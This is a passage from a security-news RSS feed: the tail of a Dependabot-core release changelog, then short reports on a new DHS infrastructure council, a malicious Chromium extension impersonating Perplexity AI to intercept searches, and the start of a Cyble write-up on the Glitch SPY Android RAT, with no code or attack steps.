<li>don't fail if nuget cred is missing url by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721038688" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15378" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15378/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15378">#15378</a></li>
<li>Type commit_message_options with a value object by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4731577963" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15400" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15400/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15400">#15400</a></li>
<li>Type the Dependabot config file parser by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4731644129" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15401" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15401/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15401">#15401</a></li>
<li>Fix Terraform registry replacement typing and credential semantics by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4734067707" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15406" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15406/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15406">#15406</a></li>
<li>fix: avoid path collisions for SHA-pinned GitHub Actions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/markhallen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/markhallen">@markhallen</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317086858" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14806" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14806/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14806">#14806</a></li>
<li>Nix: skip flake inputs pinned to a bare commit SHA by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4740718886" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15412" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15412/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15412">#15412</a></li>
<li>Type the vulnerability version-range renderer by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4731673648" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15402" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15402/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15402">#15402</a></li>
<li>Add JobCommand enum and Command property to NuGet Job model by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4643997783" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15277" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15277/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15277">#15277</a></li>
<li>Upgrade Ruby to 4.0.5 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bo98/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bo98">@Bo98</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333052029" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/14830" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/14830/hovercard" href="https://github.com/dependabot/dependabot-core/pull/14830">#14830</a></li>
<li>Bump updater-core image to RubyGems/Bundler 4.0.13 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4618733501" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15256" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15256/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15256">#15256</a></li>
<li>Fix issue with <code>PrivateRegistryConfigNotFound</code> error incorrectly firing when scope is configured by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4746967053" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15416" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15416/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15416">#15416</a></li>
<li>Fake MSBuild SolutionDir during NuGet discovery (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3717692367" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/13756" data-hovercard-type="issue" data-hovercard-url="/dependabot/dependabot-core/issues/13756/hovercard" href="https://github.com/dependabot/dependabot-core/issues/13756">#13756</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4729122800" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15392" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15392/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15392">#15392</a></li>
<li>NuGet: Filter all editable files not present prior to discovery by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4702669203" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15358" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15358/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15358">#15358</a></li>
<li>Support Central Package Versions updates in XmlFileWriter by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4737397188" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15409" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15409/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15409">#15409</a></li>
<li>[Update Graph] Report empty manifests as present but empty instead of omitting them by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brrygrdn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brrygrdn">@brrygrdn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4753676533" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15427" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15427/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15427">#15427</a></li>
<li>Fix vcpkg empty PRs for up-to-date baselines by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4747606732" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15420" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15420/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15420">#15420</a></li>
<li>Nix: update NixOS channel tarball inputs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4741094986" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15413" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15413/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15413">#15413</a></li>
<li>fix(opentofu): accept terraform_registry credentials for OCI registry tags by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4750827433" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15422" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15422/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15422">#15422</a></li>
<li>Commit changes to workspace member TOML files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/crabbit-git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/crabbit-git">@crabbit-git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4523481545" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15142" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15142/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15142">#15142</a></li>
<li>Fix COREPACK_NPM_REGISTRY trailing slash causing pnpm HTTP 404 on private registries by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> with @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4768494620" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15444" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15444/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15444">#15444</a></li>
<li>Map additional NuGet feed errors to private_source_bad_response by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4753622799" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15426" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15426/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15426">#15426</a></li>
<li>Support <code>version</code> and <code>security</code> NuGet job commands by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4754398088" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15430" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15430/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15430">#15430</a></li>
<li>Show the vcpkg release tag instead of master in PR titles by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4755756847" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15433" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15433/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15433">#15433</a></li>
<li>Register MSBuild before running the job so early NuGet errors are reported by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4755361507" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15431" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15431/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15431">#15431</a></li>
<li>Add a baseline to vcpkg projects missing one by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4755503458" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15432" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15432/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15432">#15432</a></li>
<li>Fix file updater failed to update for all support files sentry error by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4749866303" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15421" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15421/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15421">#15421</a></li>
<li>Skip disabled Maven repositories by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adoroszlai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adoroszlai">@adoroszlai</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4767441385" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15443" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15443/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15443">#15443</a></li>
<li>v0.384.0 by @dependabot-core-action-automation[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4764477683" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15438" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15438/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15438">#15438</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/crabbit-git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/crabbit-git">@crabbit-git</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4523481545" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15142" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15142/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15142">#15142</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adoroszlai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adoroszlai">@adoroszlai</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4767441385" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15443" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15443/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15443">#15443</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/dependabot/dependabot-core/compare/v0.383.0...v0.384.0"><tt>v0.383.0...v0.384.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[DHS to unveil replacement council for critical infrastructure cybersecurity]]></title>
<description><![CDATA[The Department of Homeland Security is bringing back a key cybersecurity information sharing effort with critical infrastructure, more than a year after the Trump administration shuttered an existing nerve center between government and private sector. The Alliance of National Councils for Homelan...]]></description>
<link>https://tsecurity.de/de/3636174/it-security-nachrichten/dhs-to-unveil-replacement-council-for-critical-infrastructure-cybersecurity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636174/it-security-nachrichten/dhs-to-unveil-replacement-council-for-critical-infrastructure-cybersecurity/</guid>
<pubDate>Tue, 30 Jun 2026 18:09:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Department of Homeland Security is bringing back a key cybersecurity information sharing effort with critical infrastructure, more than a year after the Trump administration shuttered an existing nerve center between government and private sector. The Alliance of National Councils for Homeland Operational Resilience – Critical Infrastructure program, first reported by CyberScoop in January, is meant […]</p>
<p>The post <a href="https://cyberscoop.com/dhs-anchor-ci-cybersecurity-information-sharing/">DHS to unveil replacement council for critical infrastructure cybersecurity</a> appeared first on <a href="https://cyberscoop.com/">CyberScoop</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fake Perplexity extension on Chrome Web Store tracked searches]]></title>
<description><![CDATA[A malicious extension in the Chrome Web Store is masquerading as the Perplexity AI answer engine, intercepting search traffic and collecting browsing information. [...]]]></description>
<link>https://tsecurity.de/de/3636164/it-security-nachrichten/fake-perplexity-extension-on-chrome-web-store-tracked-searches/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636164/it-security-nachrichten/fake-perplexity-extension-on-chrome-web-store-tracked-searches/</guid>
<pubDate>Tue, 30 Jun 2026 18:08:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A malicious extension in the Chrome Web Store is masquerading as the Perplexity AI answer engine, intercepting search traffic and collecting browsing information. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Malicious Chromium extension spoofs Perplexity AI to hijack browser searches]]></title>
<description><![CDATA[Google has removed a malicious browser extension masquerading as Perplexity AI after Microsoft researchers found it was intercepting users’ search traffic and routing queries through attacker-controlled servers before forwarding them to legitimate search engines.



Microsoft Threat Intelligence ...]]></description>
<link>https://tsecurity.de/de/3635477/it-security-nachrichten/malicious-chromium-extension-spoofs-perplexity-ai-to-hijack-browser-searches/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635477/it-security-nachrichten/malicious-chromium-extension-spoofs-perplexity-ai-to-hijack-browser-searches/</guid>
<pubDate>Tue, 30 Jun 2026 13:53:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google has removed a malicious browser extension masquerading as Perplexity AI after Microsoft researchers found it was intercepting users’ search traffic and routing queries through attacker-controlled servers before forwarding them to legitimate search engines.</p>



<p>Microsoft Threat Intelligence said the extension masqueraded as the AI-powered answer engine to trick users into installing it. Based on its analysis, the company said the extension’s primary objective was to intercept search traffic and collect browsing data while maintaining a normal browsing experience, making the activity difficult for users to detect.</p>



<p>“Microsoft Threat Intelligence has identified a malicious Chromium-based extension that spoofs the AI-powered answer engine Perplexity AI to trick unsuspecting users into installing it,” the company’s threat intelligence team said in a <a href="https://www.microsoft.com/en-us/security/blog/2026/06/29/chromium-extension-uses-airelated-branding-redirect-browser-search/" target="_blank" rel="noreferrer noopener">blog post</a>. “Based on our observation of the extension’s behavior, we assess its primary objective to be search traffic interception and data collection, which might enable downstream use cases such as profiling, targeted advertising, or other forms of misuse depending on operator intent.”</p>



<p>Microsoft said it reported the extension to Google, which subsequently removed it.</p>



<p>The incident reflects a broader trend identified by Microsoft’s researchers, who <a href="https://www.csoonline.com/article/4182881/security-shifts-to-the-human-layer-as-ai-scams-surge.html">earlier this month warned</a> that attackers were increasingly abusing the names and branding of popular AI platforms in phishing and malware campaigns.</p>



<h2 class="wp-block-heading">Extension quietly intercepted browser searches</h2>



<p>Unlike traditional browser hijackers that alter search results or flood users with advertisements, the extension operated less conspicuously.</p>



<p>According to Microsoft, it abused Chromium’s Manifest V3 APIs to intercept searches entered through the browser’s address bar, forwarding those queries through intermediary infrastructure controlled by the attacker before redirecting users to legitimate search providers. Because victims ultimately received the expected search results, the activity could remain largely unnoticed, the blog post added.</p>



<p>“The use of intermediary infrastructure allows the operator to observe search traffic while maintaining the expected browsing experience,” Microsoft Threat Intelligence said.</p>



<p>The attack also relied on user trust rather than exploiting a browser vulnerability.</p>



<p>“What makes this interesting is that the attack doesn’t really depend on exploiting a browser vulnerability. The user becomes the initial access vector,” said Vibhum Dubey, an independent cybersecurity researcher and red teamer.</p>



<p>Employees routinely install browser-based productivity tools, password managers, and AI assistants, making AI-branded extensions appear legitimate, Dubey said. “Users also expect AI tools to request broad permissions to access websites and browser content, allowing malicious permission requests to blend in with legitimate functionality.”</p>



<h2 class="wp-block-heading">Why AI brands make good bait</h2>



<p>For attackers, trusted AI brands are becoming increasingly attractive social engineering lures as enterprises accelerate adoption of generative AI tools.</p>



<p>“Attackers are following user trust,” said Sushovan Mukhopadhyay, director analyst at Gartner. “As employees adopt AI tools quickly, trusted AI brands become high-value bait for social engineering.”</p>



<p>Browser extensions can quietly become “a data collection layer inside the employee’s everyday workflow,” exposing sensitive search queries, browsing activity, and business context, he said.</p>



<p>Mukhopadhyay said the larger issue is that enterprise AI adoption is moving faster than security governance, creating opportunities for attackers to exploit the gap between employee enthusiasm and organizational controls.</p>



<h2 class="wp-block-heading">A governance blind spot</h2>



<p>Both experts said the harder enterprise problem is visibility.</p>



<p>“Most organizations have a mature process for software inventory, but very few have the same level of visibility for browser extensions,” Dubey said. During security assessments, he has seen organizations maintain strict application allowlists while employees continued installing browser extensions with little or no oversight.</p>



<p>Rather than looking only for known malicious extensions, security teams should monitor for risky behaviors such as changes to default search providers, requests for access to all websites, communications with domains unrelated to the claimed publisher, and extensions that seek additional permissions after installation, he said.</p>



<p>Microsoft similarly recommended that organizations verify extension publishers, carefully review requested permissions, and monitor enterprise browsers for unauthorized or unapproved extensions.</p>



<p>Mukhopadhyay said CISOs should begin treating browser extensions as governed enterprise software rather than personal productivity tools.</p>



<p>“That means using allowlists, permission reviews, search-setting monitoring, and controls for unapproved AI tools,” he said. Citing Gartner data, he said by 2029, 30% of enterprises will use secure enterprise browser technologies to improve browser extension auditing, risk profiling, and policy enforcement. </p>



<p>As browsers become the primary workspace for email, SaaS applications, and AI assistants, attackers are likely to continue targeting them, Dubey said. Organizations should therefore treat browser extensions “as third-party software suppliers” that are reviewed, approved, and continuously monitored like any other enterprise application.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fake Perplexity AI Extension Captures Real-Time Search Suggestions and Browser Signals]]></title>
<description><![CDATA[A fake browser extension disguised as the popular AI search tool Perplexity AI has been caught quietly capturing users’ real-time search inputs and browser signals, raising serious concerns about how easily trusted brand names can be used against ordinary users.…
Read more →
The post Fake Perplex...]]></description>
<link>https://tsecurity.de/de/3635320/it-security-nachrichten/fake-perplexity-ai-extension-captures-real-time-search-suggestions-and-browser-signals/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635320/it-security-nachrichten/fake-perplexity-ai-extension-captures-real-time-search-suggestions-and-browser-signals/</guid>
<pubDate>Tue, 30 Jun 2026 13:06:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A fake browser extension disguised as the popular AI search tool Perplexity AI has been caught quietly capturing users’ real-time search inputs and browser signals, raising serious concerns about how easily trusted brand names can be used against ordinary users.…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/fake-perplexity-ai-extension-captures-real-time-search-suggestions-and-browser-signals/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/fake-perplexity-ai-extension-captures-real-time-search-suggestions-and-browser-signals/">Fake Perplexity AI Extension Captures Real-Time Search Suggestions and Browser Signals</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fake Perplexity AI Extension Captures Real-Time Search Suggestions and Browser Signals]]></title>
<description><![CDATA[A fake browser extension disguised as the popular AI search tool Perplexity AI has been caught quietly capturing users’ real-time search inputs and browser signals, raising serious concerns about how easily trusted brand names can be used against ordinary users. The extension, which went by the n...]]></description>
<link>https://tsecurity.de/de/3635298/it-security-nachrichten/fake-perplexity-ai-extension-captures-real-time-search-suggestions-and-browser-signals/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635298/it-security-nachrichten/fake-perplexity-ai-extension-captures-real-time-search-suggestions-and-browser-signals/</guid>
<pubDate>Tue, 30 Jun 2026 12:52:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A fake browser extension disguised as the popular AI search tool Perplexity AI has been caught quietly capturing users’ real-time search inputs and browser signals, raising serious concerns about how easily trusted brand names can be used against ordinary users. The extension, which went by the name “Search for perplexity ai,” was built to look […]</p>
<p>The post <a href="https://cybersecuritynews.com/fake-perplexity-ai-extension-captures-real-time-search/">Fake Perplexity AI Extension Captures Real-Time Search Suggestions and Browser Signals</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Glitch SPY: An Emerging Android RAT Distributed Through a Fake Polish Rental App]]></title>
<description><![CDATA[Executive Summary




Cyble Research and Intelligence Labs identified an emerging Android malware family tracked as Glitch SPY, distributed through a fraudulent Polish apartment and house rental platform designed to lure users into downloading an Android APK.


Based on the Polish-language lure a...]]></description>
<link>https://tsecurity.de/de/3635150/it-security-nachrichten/glitch-spy-an-emerging-android-rat-distributed-through-a-fake-polish-rental-app/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635150/it-security-nachrichten/glitch-spy-an-emerging-android-rat-distributed-through-a-fake-polish-rental-app/</guid>
<pubDate>Tue, 30 Jun 2026 12:08:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1200" height="600" src="https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-6.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Glitch SPY" decoding="async" srcset="https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-6.jpg 1200w, https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-6-300x150.jpg 300w, https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-6-1024x512.jpg 1024w, https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-6-768x384.jpg 768w" sizes="(max-width: 1200px) 100vw, 1200px" title="Glitch SPY: An Emerging Android RAT Distributed Through a Fake Polish Rental App 1"></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Executive Summary</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Cyble Research and Intelligence Labs identified an emerging Android malware family tracked as <strong>Glitch SPY</strong>, distributed through a fraudulent Polish apartment and house rental platform designed to lure users into downloading an Android APK.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Based on the Polish-language lure and rental-themed distribution website, the activity appears to be Poland-focused, targeting users in Poland or Polish expats.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
